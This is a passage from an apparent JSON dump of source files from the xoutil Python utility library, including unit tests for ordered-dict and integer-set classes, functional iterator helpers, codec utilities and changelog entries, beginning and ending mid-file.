self.assertEqual(list(reversed(od)), [t[0] for t in reversed(pairs)])\n\n def test_popitem(self):\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n shuffle(pairs)\n od = RankedDict(pairs)\n while pairs:\n self.assertEqual(od.popitem(), pairs.pop())\n with self.assertRaises(KeyError):\n od.popitem()\n self.assertEqual(len(od), 0)\n\n def test_pop(self):\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n shuffle(pairs)\n od = RankedDict(pairs)\n shuffle(pairs)\n while pairs:\n k, v = pairs.pop()\n self.assertEqual(od.pop(k), v)\n with self.assertRaises(KeyError):\n od.pop(\"xyz\")\n self.assertEqual(len(od), 0)\n self.assertEqual(od.pop(k, 12345), 12345)\n\n # make sure pop still works when __missing__ is defined\n class Missing(RankedDict):\n def __missing__(self, key):\n return 0\n\n m = Missing(a=1)\n self.assertEqual(m.pop(\"b\", 5), 5)\n self.assertEqual(m.pop(\"a\", 6), 1)\n self.assertEqual(m.pop(\"a\", 6), 6)\n with self.assertRaises(KeyError):\n m.pop(\"a\")\n\n def test_equality(self):\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n shuffle(pairs)\n od1 = RankedDict(pairs)\n od2 = RankedDict(pairs)\n # same order implies equality\n self.assertEqual(od1, od2)\n pairs = pairs[2:] + pairs[:2]\n od2 = RankedDict(pairs)\n # different order implies inequality\n self.assertNotEqual(od1, od2)\n # comparison to regular dict is not order sensitive\n self.assertEqual(od1, dict(od2))\n self.assertEqual(dict(od2), od1)\n # different length implied inequality\n self.assertNotEqual(od1, RankedDict(pairs[:-1]))\n\n def test_copying(self):\n # Check that ranked dicts are copyable, deepcopyable, picklable,\n # and have a repr/eval round-trip\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n od = RankedDict(pairs)\n update_test = RankedDict()\n update_test.update(od)\n for i, dup in enumerate(\n [\n od.copy(),\n copy.copy(od),\n copy.deepcopy(od),\n pickle.loads(pickle.dumps(od, 0)),\n pickle.loads(pickle.dumps(od, 1)),\n pickle.loads(pickle.dumps(od, 2)),\n pickle.loads(pickle.dumps(od, -1)),\n eval(repr(od)),\n update_test,\n RankedDict(od),\n ]\n ):\n self.assertTrue(dup is not od)\n self.assertEqual(dup, od)\n self.assertEqual(list(dup.items()), list(od.items()))\n self.assertEqual(len(dup), len(od))\n self.assertEqual(type(dup), type(od))\n\n def test_yaml_linkage(self):\n # Verify that __reduce__ is setup in a way that supports PyYAML's\n # dump() feature.\n # In yaml, lists are native but tuples are not.\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n od = RankedDict(pairs)\n # yaml.dump(od) -->\n # '!!python/object/apply:__main__.RankedDict\\n- - [a, 1]\\n - [b, 2]\\n'\n self.assertTrue(\n all(type(pair) == list for pair in od.__reduce__()[1])\n )\n\n def test_repr(self):\n od = RankedDict([(\"c\", 1), (\"b\", 2), (\"a\", 3)])\n self.assertEqual(\n repr(od), \"RankedDict([('c', 1), ('b', 2), ('a', 3)])\"\n )\n self.assertEqual(eval(repr(od)), od)\n self.assertEqual(repr(RankedDict()), \"RankedDict()\")\n\n def test_repr_recursive(self):\n # See issue #9826\n od = RankedDict.fromkeys(\"abc\")\n od[\"x\"] = od\n self.assertEqual(\n repr(od),\n (\n \"RankedDict([('a', None), ('b', None), \"\n \"('c', None), ('x', ...)])\"\n ),\n )\n\n def test_setdefault(self):\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n shuffle(pairs)\n od = RankedDict(pairs)\n pair_order = list(od.items())\n self.assertEqual(od.setdefault(\"a\", 10), 3)\n # make sure order didn't change\n self.assertEqual(list(od.items()), pair_order)\n self.assertEqual(od.setdefault(\"x\", 10), 10)\n # make sure 'x' is added to the end\n self.assertEqual(list(od.items())[-1], (\"x\", 10))\n\n # make sure setdefault still works when __missing__ is defined\n class Missing(RankedDict):\n def __missing__(self, key):\n return 0\n\n self.assertEqual(Missing().setdefault(5, 9), 9)\n\n def test_reinsert(self):\n # Given insert a, insert b, delete a, re-insert a,\n # verify that a is now later than b.\n od = RankedDict()\n od[\"a\"] = 1\n od[\"b\"] = 2\n del od[\"a\"]\n od[\"a\"] = 1\n self.assertEqual(list(od.items()), [(\"b\", 2), (\"a\", 1)])\n\n def test_move_to_end(self):\n od = RankedDict.fromkeys(\"abcde\")\n self.assertEqual(list(od), list(\"abcde\"))\n od.move_to_end(\"c\")\n self.assertEqual(list(od), list(\"abdec\"))\n od.move_to_end(\"c\", 0)\n self.assertEqual(list(od), list(\"cabde\"))\n od.move_to_end(\"c\", 0)\n self.assertEqual(list(od), list(\"cabde\"))\n od.move_to_end(\"e\")\n self.assertEqual(list(od), list(\"cabde\"))\n with self.assertRaises(KeyError):\n od.move_to_end(\"x\")\n\n @unittest.skipIf(\"PyPy\" in sys.version, \"sys.getsizeof not supported\")\n def test_sizeof(self):\n # Wimpy test: Just verify the reported size is larger than a regular\n # dict\n d = dict(a=1)\n od = RankedDict(**d)\n self.assertGreater(sys.getsizeof(od), sys.getsizeof(d))\n\n\nclass TestPascalSet(unittest.TestCase):\n def test_consistency(self):\n from random import randint\n from xoutil.future.collections import PascalSet\n\n count = 5\n for test in range(count):\n size = randint(20, 60)\n ranges = (range(i, randint(i, i + 3)) for i in range(1, size))\n s1 = PascalSet(*ranges)\n ranges = (range(i, randint(i, i + 3)) for i in range(1, size))\n s2 = PascalSet(*ranges)\n ss1 = set(s1)\n ss2 = set(s2)\n self.assertEqual(s1, ss1)\n self.assertEqual(s1 - s2, ss1 - ss2)\n self.assertEqual(s2 - s1, ss2 - ss1)\n self.assertEqual(s1 & s2, ss1 & ss2)\n self.assertEqual(s2 & s1, ss2 & ss1)\n self.assertEqual(s1 | s2, ss1 | ss2)\n self.assertEqual(s2 | s1, ss2 | ss1)\n self.assertEqual(s1 ^ s2, ss1 ^ ss2)\n self.assertEqual(s2 ^ s1, ss2 ^ ss1)\n self.assertLess(s1 - s2, s1)\n self.assertLess(s1 - s2, ss1)\n self.assertLessEqual(s1 - s2, s1)\n self.assertLessEqual(s1 - s2, ss1)\n self.assertGreater(s1, s1 - s2)\n self.assertGreater(s1, ss1 - ss2)\n self.assertGreaterEqual(s1, s1 - s2)\n self.assertGreaterEqual(s1, ss1 - ss2)\n\n def test_syntax_sugar(self):\n from xoutil.future.collections import PascalSet\n\n s1 = PascalSet[1:4, 9, 15:18]\n s2 = PascalSet[3:18]\n self.assertEqual(str(s1), \"{1..3, 9, 15..17}\")\n self.assertEqual(str(s1 ^ s2), \"{1, 2, 4..8, 10..14}\")\n self.assertEqual(list(PascalSet[3:18]), list(range(3, 18)))\n\n def test_operators(self):\n from xoutil.future.collections import PascalSet\n\n g = lambda s: (i for i in s)\n s1 = PascalSet[1:4, 9, 15:18]\n r1 = range(1, 18)\n s2 = PascalSet(s1, 20)\n self.assertTrue(s1.issubset(s1))\n self.assertTrue(s1.issubset(set(s1)))\n self.assertTrue(s1.issubset(list(s1)))\n self.assertTrue(s1.issubset(g(s1)))\n self.assertTrue(s1.issubset(r1))\n self.assertTrue(s1.issubset(set(r1)))\n self.assertTrue(s1.issubset(list(r1)))\n self.assertTrue(s1.issubset(g(r1)))\n self.assertTrue(s2.issuperset(s2))\n self.assertTrue(s2.issuperset(s1))\n self.assertTrue(s2.issuperset(set(s1)))\n self.assertTrue(s2.issuperset(list(s1)))\n self.assertTrue(s2.issuperset(g(s1)))\n self.assertTrue(s1 <= set(s1))\n self.assertTrue(s1 < s2)\n self.assertTrue(s1 <= s2)\n self.assertTrue(s1 < set(s2))\n self.assertTrue(s1 <= set(s2))\n self.assertTrue(s1 < set(r1))\n self.assertTrue(s1 <= set(r1))\n self.assertTrue(s2 >= s2)\n self.assertTrue(s2 >= set(s2))\n self.assertTrue(s2 > s1)\n self.assertTrue(s2 > set(s1))\n self.assertTrue(s2 >= s1)\n self.assertTrue(s2 >= set(s1))\n\n def test_errors(self):\n \"\"\"Test that stacked.pop has the same semantics has dict.pop.\"\"\"\n from xoutil.future.collections import PascalSet\n\n s1 = PascalSet[1:4, 9, 15:18]\n s2 = PascalSet(s1, 20)\n self.assertLess(s1, s2)\n try:\n if s1 < list(s2):\n state = \"less\"\n else:\n state = \"not-less\"\n except TypeError:\n state = \"TypeError\"\n self.assertEqual(state, \"TypeError\")\n with self.assertRaises(TypeError):\n if s1 < set(s2):\n state = \"ok\"\n if s1 < list(s2):\n state = \"safe-less\"\n else:\n state = \"safe-not-less\"\n self.assertEqual(state, \"ok\")\n\n\nclass TestBitPascalSet(unittest.TestCase):\n def test_consistency(self):\n from random import randint\n from xoutil.future.collections import BitPascalSet\n\n count = 5\n for test in range(count):\n size = randint(20, 60)\n ranges = (range(i, randint(i, i + 3)) for i in range(1, size))\n s1 = BitPascalSet(*ranges)\n ranges = (range(i, randint(i, i + 3)) for i in range(1, size))\n s2 = BitPascalSet(*ranges)\n ss1 = set(s1)\n ss2 = set(s2)\n self.assertEqual(s1, ss1)\n self.assertEqual(s1 - s2, ss1 - ss2)\n self.assertEqual(s2 - s1, ss2 - ss1)\n self.assertEqual(s1 & s2, ss1 & ss2)\n self.assertEqual(s2 & s1, ss2 & ss1)\n self.assertEqual(s1 | s2, ss1 | ss2)\n self.assertEqual(s2 | s1, ss2 | ss1)\n self.assertEqual(s1 ^ s2, ss1 ^ ss2)\n self.assertEqual(s2 ^ s1, ss2 ^ ss1)\n self.assertLess(s1 - s2, s1)\n self.assertLess(s1 - s2, ss1)\n self.assertLessEqual(s1 - s2, s1)\n self.assertLessEqual(s1 - s2, ss1)\n self.assertGreater(s1, s1 - s2)\n self.assertGreater(s1, ss1 - ss2)\n self.assertGreaterEqual(s1, s1 - s2)\n self.assertGreaterEqual(s1, ss1 - ss2)\n\n def test_syntax_sugar(self):\n from xoutil.future.collections import BitPascalSet\n\n s1 = BitPascalSet[1:4, 9, 15:18]\n s2 = BitPascalSet[3:18]\n self.assertEqual(str(s1), \"{1..3, 9, 15..17}\")\n self.assertEqual(str(s1 ^ s2), \"{1, 2, 4..8, 10..14}\")\n self.assertEqual(list(BitPascalSet[3:18]), list(range(3, 18)))\n\n def test_operators(self):\n from xoutil.future.collections import BitPascalSet\n\n g = lambda s: (i for i in s)\n s1 = BitPascalSet[1:4, 9, 15:18]\n r1 = range(1, 18)\n s2 = BitPascalSet(s1, 20)\n self.assertTrue(s1.issubset(s1))\n self.assertTrue(s1.issubset(set(s1)))\n self.assertTrue(s1.issubset(list(s1)))\n self.assertTrue(s1.issubset(g(s1)))\n self.assertTrue(s1.issubset(r1))\n self.assertTrue(s1.issubset(set(r1)))\n self.assertTrue(s1.issubset(list(r1)))\n self.assertTrue(s1.issubset(g(r1)))\n self.assertTrue(s2.issuperset(s2))\n self.assertTrue(s2.issuperset(s1))\n self.assertTrue(s2.issuperset(set(s1)))\n self.assertTrue(s2.issuperset(list(s1)))\n self.assertTrue(s2.issuperset(g(s1)))\n self.assertTrue(s1 <= set(s1))\n self.assertTrue(s1 < s2)\n self.assertTrue(s1 <= s2)\n self.assertTrue(s1 < set(s2))\n self.assertTrue(s1 <= set(s2))\n self.assertTrue(s1 < set(r1))\n self.assertTrue(s1 <= set(r1))\n self.assertTrue(s2 >= s2)\n self.assertTrue(s2 >= set(s2))\n self.assertTrue(s2 > s1)\n self.assertTrue(s2 > set(s1))\n self.assertTrue(s2 >= s1)\n self.assertTrue(s2 >= set(s1))\n\n def test_errors(self):\n \"\"\"Test that stacked.pop has the same semantics has dict.pop.\"\"\"\n from xoutil.future.collections import BitPascalSet\n\n s1 = BitPascalSet[1:4, 9, 15:18]\n s2 = BitPascalSet(s1, 20)\n self.assertLess(s1, s2)\n try:\n if s1 < list(s2):\n state = \"less\"\n else:\n state = \"not-less\"\n except TypeError:\n state = \"TypeError\"\n self.assertEqual(state, \"TypeError\")\n with self.assertRaises(TypeError):\n if s1 < set(s2):\n state = \"ok\"\n if s1 < list(s2):\n state = \"safe-less\"\n else:\n state = \"safe-not-less\"\n self.assertEqual(state, \"ok\")\n\n\nclass TestCodeDict(unittest.TestCase):\n def test_formatter(self):\n from xoutil.future.collections import codedict\n\n cd = codedict(x=1, y=2, z=3.0)\n self.assertEqual(\n \"{_[x + y]} is 3 -- {_[x + z]} is 4.0\".format(_=cd),\n \"3 is 3 -- 4.0 is 4.0\",\n )\n self.assertEqual(\n cd >> \"{_[x + y]} is 3 -- {_[x + z]} is 4.0 -- {x} is 1\",\n \"3 is 3 -- 4.0 is 4.0 -- 1 is 1\",\n )\n self.assertEqual(\n \"{_[x + y]} is 3 -- {_[x + z]} is 4.0 -- {x} is 1\" << cd,\n \"3 is 3 -- 4.0 is 4.0 -- 1 is 1\",\n )\n\n\ndef test_abcs():\n from xoutil.future.collections import Container # noqa\n from xoutil.future.collections import Iterable # noqa\n from xoutil.future.collections import Iterator # noqa\n from xoutil.future.collections import Sized # noqa\n from xoutil.future.collections import Callable # noqa\n from xoutil.future.collections import Sequence # noqa\n from xoutil.future.collections import MutableSequence # noqa\n from xoutil.future.collections import Set # noqa\n from xoutil.future.collections import MutableSet # noqa\n from xoutil.future.collections import Mapping # noqa\n from xoutil.future.collections import MutableMapping # noqa\n from xoutil.future.collections import MappingView # noqa\n from xoutil.future.collections import ItemsView # noqa\n from xoutil.future.collections import KeysView # noqa\n from xoutil.future.collections import ValuesView # noqa\n\n\ndef test_opendict():\n try:\n from enum import Enum\n except ImportError:\n from enum34 import Enum\n\n from xoutil.future.collections import opendict\n\n class Foo:\n x = 1\n _y = 2\n\n foo = opendict.from_enum(Foo)\n assert dict(foo) == {\"x\": 1}\n\n class Bar(Enum):\n spam = \"spam\"\n\n def eat(self):\n return self.spam\n\n bar = opendict.from_enum(Bar)\n assert dict(bar) == {\"spam\": Bar.spam}\n\n\nif __name__ == \"__main__\":\n # import sys;sys.argv = ['', 'Test.testName']\n unittest.main(verbosity=2)\n" }, { "alpha_fraction": 0.5544736981391907, "alphanum_fraction": 0.5828947424888611, "avg_line_length": 31.20339012145996, "blob_id": "9c7615227572fdf9804d8a861f5c5e426ac94688", "content_id": "b5bb9aae0f9d846cf1ca0e4ee248adf874f55797", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3801, "license_type": "no_license", "max_line_length": 80, "num_lines": 118, "path": "/xotl/tools/fp/iterators.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\"\"\"Functional tools for functions that returns iterators (generators, etc.)\n\n.. warning:: This module is experimental. It may be removed completely, moved\n or otherwise changed.\n\n\"\"\"\nfrom typing import Callable, Iterable, TypeVar\nfrom functools import reduce\nfrom xotl.tools.deprecation import deprecated_alias\n\nT = TypeVar(\"T\")\n\n\ndef kleisli_compose(\n *fs: Callable[[T], Iterable[T]]\n) -> Callable[[T], Iterable[T]]:\n \"\"\"The Kleisli composition operator (right-to-left version).\n\n For two functions, ``kleisli_compose(g, f)`` returns::\n\n lambda x: (z for y in f(x) for z in g(y))\n\n In general this is, ``reduce(_compose, fs, lambda x: [x])``; where\n ``_compose`` is the lambda for two arguments.\n\n .. note:: Despite name (Kleisli), Python does not have a true Monad_\n type-class. So this function works with functions taking a single\n argument and returning an iterator -- it also works with iterables.\n\n .. _Monad: https://en.wikipedia.org/wiki/Monad_(functional_programming)\n\n .. versionadded:: 1.9.6\n .. versionchanged:: 1.9.7 Name changed to ``kleisli_compose``.\n\n .. warning:: You may want to use `kleisli_compose_foldl`:func: which\n matches the order semantics of the functional kleisli composition\n ``>=>``.\n\n \"\"\"\n\n def _kleisli_compose(g, f):\n # (>>.) :: Monad m => (b -> m c) -> (a -> m b) -> a -> m c\n # g >>. f = \\x -> f x >>= g\n #\n # In the list monad:\n #\n # g >>. f = \\x -> concat (map g (f x))\n return lambda x: (z for y in f(x) for z in g(y))\n\n if len(fs) == 2:\n # optimize a bit so that we can avoid the 'lambda x: [x]' for common\n # cases.\n return _kleisli_compose(*fs)\n else:\n return reduce(_kleisli_compose, fs, lambda x: iter([x]))\n\n\ndef kleisli_compose_foldl(\n *fs: Callable[[T], Iterable[T]]\n) -> Callable[[T], Iterable[T]]:\n \"\"\"Same as `kleisli_compose`:func: but composes left-to-right.\n\n Examples:\n\n >>> s15 = lambda s: tuple(s + str(i) for i in range(1, 5))\n >>> s68 = lambda s: tuple(s + str(i) for i in range(6, 8))\n\n # kleisli_compose produces \"6\" >>= 1, 2, 3, 4; and then \"7\" >>= 1, 2, 3, 4\n >>> list(kleisli_compose(s15, s68)(\"\"))\n ['61', '62', '63', '64', '71', '72', '73', '74']\n\n >>> list(kleisli_compose_foldl(s15, s68)(\"\"))\n ['16', '17', '26', '27', '36', '37', '46', '47']\n\n If the operation is non-commutative (as the string concatenation) you end\n up with very different results.\n\n >>> n15 = lambda s: tuple(s + i for i in range(1, 5))\n >>> n68 = lambda s: tuple(s + i for i in range(6, 8))\n\n >>> list(kleisli_compose(n15, n68)(0))\n [7, 8, 9, 10, 8, 9, 10, 11]\n\n >>> list(kleisli_compose_foldl(n15, n68)(0))\n [7, 8, 8, 9, 9, 10, 10, 11]\n\n If the operation is commutative you get the same *set* of results, but the\n order may be different.\n\n The name of `kleisli_compose_foldl` comes from the fact the it resembles\n\n \"\"\"\n # This basically the same as _kleisli_compose above but with f and g\n # swapped.\n #\n # In our derivation of\n def _kleisli_compose_foldl(f, g):\n return lambda x: (z for y in f(x) for z in g(y))\n\n if len(fs) == 2:\n # optimize a bit so that we can avoid the 'lambda x: [x]' for common\n # cases.\n return _kleisli_compose_foldl(*fs)\n else:\n return reduce(_kleisli_compose_foldl, fs, lambda x: iter([x]))\n\n\niter_compose = deprecated_alias(kleisli_compose)\n\ndel deprecated_alias\n" }, { "alpha_fraction": 0.7175925970077515, "alphanum_fraction": 0.7268518805503845, "avg_line_length": 35, "blob_id": "90a5b6fd8e938a32490a1c6516bde82a4f13e46e", "content_id": "d92f932d37c0b64dca0041b0ce23a0909fe6c655", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 216, "license_type": "permissive", "max_line_length": 69, "num_lines": 6, "path": "/docs/source/history/_changes-1.8.3.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix bug #20: `xoutil.future.calendar`:mod: may fail at import time.\n\n- Add `xoutil.params.pop_keyword_values`:func:.\n\n- Add `xoutil.future.collections.codedict`:class:. Deprecate module\n `xoutil.formatter`:mod:.\n" }, { "alpha_fraction": 0.5871824622154236, "alphanum_fraction": 0.5981523990631104, "avg_line_length": 29.928571701049805, "blob_id": "d511e91073ad9c9bdb3af58b10e8c3f6b9f324e5", "content_id": "b62a2d2bca7c3cb422037dd0544308e8f1cd83cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3465, "license_type": "no_license", "max_line_length": 79, "num_lines": 112, "path": "/xotl/tools/future/codecs.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ----------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Codec registry, base classes and tools.\n\nIn this module, some additions for `codecs` standard module.\n\n\"\"\"\n\n\nfrom codecs import * # noqa\nfrom codecs import __all__ # noqa\n\n__all__ = list(__all__)\n\n\ndef force_encoding(encoding=None):\n \"\"\"Validates an encoding value.\n\n If `encoding` is None use `locale.getdefaultlocale`:func:. If that is\n also none, return 'UTF-8'.\n\n .. versionadded:: 1.2.0\n\n .. versionchanged:: 1.8.0 migrated to 'future.codecs'\n\n .. versionchanged:: 1.8.7 Stop using `locale.getpreferrededencoding`:func:\n and improve documentation.\n\n \"\"\"\n # TODO: This mechanism is tricky, we must find out how to unroll the mess\n # involving the concept of which encoding to use by default:\n #\n # - locale.getlocale(): In Python 2 returns ``(None, None)``, but in\n # Python 3 ``('en_US', 'UTF-8')``.\n #\n # - locale.getpreferredencoding(): all versions returns ``'UTF-8'``.\n #\n # - sys.getdefaultencoding(): In Python 2 returns ``'ascii'``, but in\n # Python 3 ``'utf-8'``. The same in Mac-OS. The related code was\n # commented because these differences.\n #\n # All these considerations where also proved in Mac-OS.\n import locale\n\n return encoding or locale.getdefaultlocale()[1] or \"UTF-8\"\n\n\ndef safe_decode(s, encoding=None):\n \"\"\"Similar to bytes `decode` method returning unicode.\n\n Decodes `s` using the given `encoding`, or determining one from the system.\n\n Returning type depend on python version; if 2.x is `unicode` if 3.x `str`.\n\n .. versionadded:: 1.1.3\n .. versionchanged:: 1.8.0 migrated to 'future.codecs'\n\n \"\"\"\n if isinstance(s, str):\n return s\n else:\n encoding = force_encoding(encoding)\n try:\n # In Python 3 str(b'm') returns the string \"b'm'\" and not just \"m\",\n # this fixes this.\n return str(s, encoding, \"replace\")\n except LookupError:\n # The provided enconding is not know, try with no encoding.\n return safe_decode(s)\n except TypeError:\n # For numbers and other stuff.\n return str(s)\n\n\ndef safe_encode(u, encoding=None):\n \"\"\"Similar to unicode `encode` method returning bytes.\n\n Encodes `u` using the given `encoding`, or determining one from the system.\n\n Returning type is always `bytes`; but in python 2.x is also `str`.\n\n .. versionadded:: 1.1.3\n .. versionchanged:: 1.8.0 migrated to 'future.codecs'\n\n \"\"\"\n # XXX: 'eight' pending.\n # TODO: This is not nice for Python 3, bytes is not valid string any more\n # See `json.encoder.py_encode_basestring_ascii`:func: of Python 2.x\n if isinstance(u, bytes):\n return u\n else:\n encoding = force_encoding(encoding)\n try:\n try:\n if isinstance(u, str):\n return bytes(u, encoding, \"replace\")\n else:\n return str(u).encode(encoding, \"replace\")\n except (UnicodeError, TypeError):\n return str(u).encode(encoding, \"replace\")\n except LookupError:\n return safe_encode(u)\n\n\n__all__ += (\"force_encoding\", \"safe_decode\", \"safe_encode\")\n" }, { "alpha_fraction": 0.7745097875595093, "alphanum_fraction": 0.7745097875595093, "avg_line_length": 50, "blob_id": "27854d88bc1d30e2eb667909732e2f50038be0e5", "content_id": "0e39397cafc098649e5aa302975e0deaebb89300", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 102, "license_type": "permissive", "max_line_length": 70, "num_lines": 2, "path": "/docs/source/history/_changes-1.5.6.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Warn about a future backwards incompatible change in the behavior of\n `xoutil.names.nameof`:func:.\n" }, { "alpha_fraction": 0.6472184658050537, "alphanum_fraction": 0.6512889862060547, "avg_line_length": 26.296297073364258, "blob_id": "d034878a86da660cd58ace652e6bc381c28d0e69", "content_id": "52929be6147fbd6cb7a304f6a65406725a3688a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 739, "license_type": "no_license", "max_line_length": 72, "num_lines": 27, "path": "/xotl/tools/future/time.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Extensions to Python's `time` module.\n\nYou may use it as drop-in replacement of `time`. Although we don't\ndocument all items here. Refer to `time`:mod: documentation.\n\n.. note:: This module is deprecated since `monotonic` is included in\nPython 3.3.\n\n\"\"\"\n\nfrom time import * # noqa\nfrom time import monotonic\nimport time as _stdlib # noqa\n\nfrom xotl.tools.deprecation import deprecate_module\n\ndeprecate_module(replacement=monotonic.__module__)\ndel deprecate_module\n" }, { "alpha_fraction": 0.595177173614502, "alphanum_fraction": 0.6265984773635864, "avg_line_length": 28.912569046020508, "blob_id": "8688c09bb232b139ac19e9617a46b9d767f8a51c", "content_id": "fa9ad32bae1c0143f122335f0ab0398e649285d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5475, "license_type": "no_license", "max_line_length": 87, "num_lines": 183, "path": "/tests/test_iterators.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport pytest\nfrom hypothesis import strategies as s, given\n\n\ndef test_first_n_no_filling():\n from xoutil.future.itertools import first_n\n\n with pytest.raises(StopIteration):\n next(first_n((), 1))\n\n\ndef test_first_n_filling_by_cycling():\n from xoutil.future.itertools import first_n\n\n assert list(first_n((), 10, range(5))) == [0, 1, 2, 3, 4] * 2\n\n\ndef test_first_n_repeat_filling_by_repeating():\n from xoutil.future.itertools import first_n\n from itertools import repeat\n\n assert list(first_n((), 10, \"0\")) == list(repeat(\"0\", 10))\n\n\ndef test_first_n_simple():\n from xoutil.future.itertools import first_n\n\n assert list(first_n(range(100), 10, 0)) == [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n\n\ndef test_slides():\n from xoutil.future.itertools import slides\n\n assert list(slides(range(1, 11))) == [(1, 2), (3, 4), (5, 6), (7, 8), (9, 10)]\n\n\ndef test_slides_filling():\n from xoutil.future.itertools import slides\n\n assert list(slides(range(1, 5), 3)) == [(1, 2, 3), (4, None, None)]\n\n\ndef test_slides_with_repeating_filling():\n from xoutil.future.itertools import slides\n\n aux = [(1, 2, 3), (4, 5, 6), (7, 8, 9), (10, None, None)]\n assert list(slides(range(1, 11), width=3, fill=None)) == aux\n\n\ndef test_slides_with_cycling_filling():\n from xoutil.future.itertools import slides\n\n aux = [(1, 2, 3, 4, 5), (6, 7, 8, 9, 10), (11, 1, 2, 1, 2)]\n assert list(slides(range(1, 12), width=5, fill=(1, 2))) == aux\n\n\ndef test_continuously_slides():\n from xoutil.future.itertools import continuously_slides\n\n aux = continuously_slides(\"maupasant\", 3, \"\")\n trigrams = list(\"\".join(x) for x in aux)\n assert \"mau\" in trigrams\n assert \"aup\" in trigrams\n assert \"upa\" in trigrams\n assert \"pas\" in trigrams\n assert \"asa\" in trigrams\n assert \"san\" in trigrams\n assert \"ant\" in trigrams\n assert len(trigrams) == 7\n\n\[email protected]\ndef keys(draw):\n return \"k%d\" % draw(s.integers(min_value=0, max_value=100))\n\n\n@given(s.dictionaries(keys(), s.integers()), s.dictionaries(keys(), s.integers()))\ndef test_dict_update_new(d1, d2):\n from xoutil.future.itertools import dict_update_new\n\n d = dict(d1)\n dict_update_new(d1, d2)\n assert all(key in d1 for key in d2)\n assert all(d1[key] == d2[key] for key in d2 if key not in d)\n\n\n@given(s.lists(s.integers(), max_size=30))\ndef test_delete_duplicates(l):\n from xoutil.future.itertools import delete_duplicates\n from xoutil.future.collections import Counter\n\n res = delete_duplicates(l)\n assert type(l) is type(res) # noqa\n assert len(res) <= len(l)\n assert all(Counter(res)[item] == 1 for item in l)\n\n\n@given(s.lists(s.integers(), max_size=30))\ndef test_delete_duplicates_with_key(l):\n from xoutil.future.itertools import delete_duplicates\n\n res = delete_duplicates(l, key=lambda x: x % 3)\n assert len(res) <= 3, \"key yields 0, 1, or 2; thus res can contain at most 3 items\"\n\n\ndef test_iter_delete_duplicates():\n from xoutil.future.itertools import iter_delete_duplicates\n\n assert list(iter_delete_duplicates(\"AAAaBBBA\")) == [\"A\", \"a\", \"B\", \"A\"]\n assert list(iter_delete_duplicates(\"AAAaBBBA\", key=lambda x: x.lower())) == [\n \"A\",\n \"B\",\n \"A\",\n ]\n\n\n@given(\n s.lists(s.integers(), max_size=30),\n s.lists(s.integers(), max_size=30),\n s.lists(s.integers(), max_size=30),\n)\ndef test_merge(l1, l2, l3):\n from xoutil.future.itertools import merge\n\n l1 = sorted(l1)\n l2 = sorted(l2)\n l3 = sorted(l3)\n # Accumulate and catch if yielding more than necessary\n iter_ = merge(l1, l2, l3)\n expected = sorted(l1 + l2 + l3)\n result = []\n for _ in range(len(expected)):\n result.append(next(iter_))\n with pytest.raises(StopIteration):\n last = next(iter_) # noqa: There cannot be more items in the merge\n assert result == expected\n\n\n@given(s.lists(s.integers(), max_size=30), s.lists(s.integers(), max_size=30))\ndef test_merge_by_key(l1, l2):\n from xoutil.future.itertools import merge\n\n l1 = [(\"l1-dummy\", i) for i in sorted(l1)]\n l2 = [(\"l2-dummy\", i) for i in sorted(l2)]\n # Accumulate and catch if yielding more than necessary\n iter_ = merge(l1, l2, key=lambda x: x[1])\n expected = sorted(l1 + l2, key=lambda x: x[1])\n result = []\n for _ in range(len(expected)):\n result.append(next(iter_))\n with pytest.raises(StopIteration):\n last = next(iter_) # noqa: There cannot be more items in the merge\n assert result == expected\n\n\n@given(s.lists(s.integers(), max_size=30), s.lists(s.integers(), max_size=30))\ndef test_merge_by_key_incomparable(l1, l2):\n class item:\n def __init__(self, x):\n self.item = x\n\n from xoutil.future.itertools import merge\n\n l1 = [item(i) for i in sorted(l1)]\n l2 = [item(i) for i in sorted(l2)]\n # 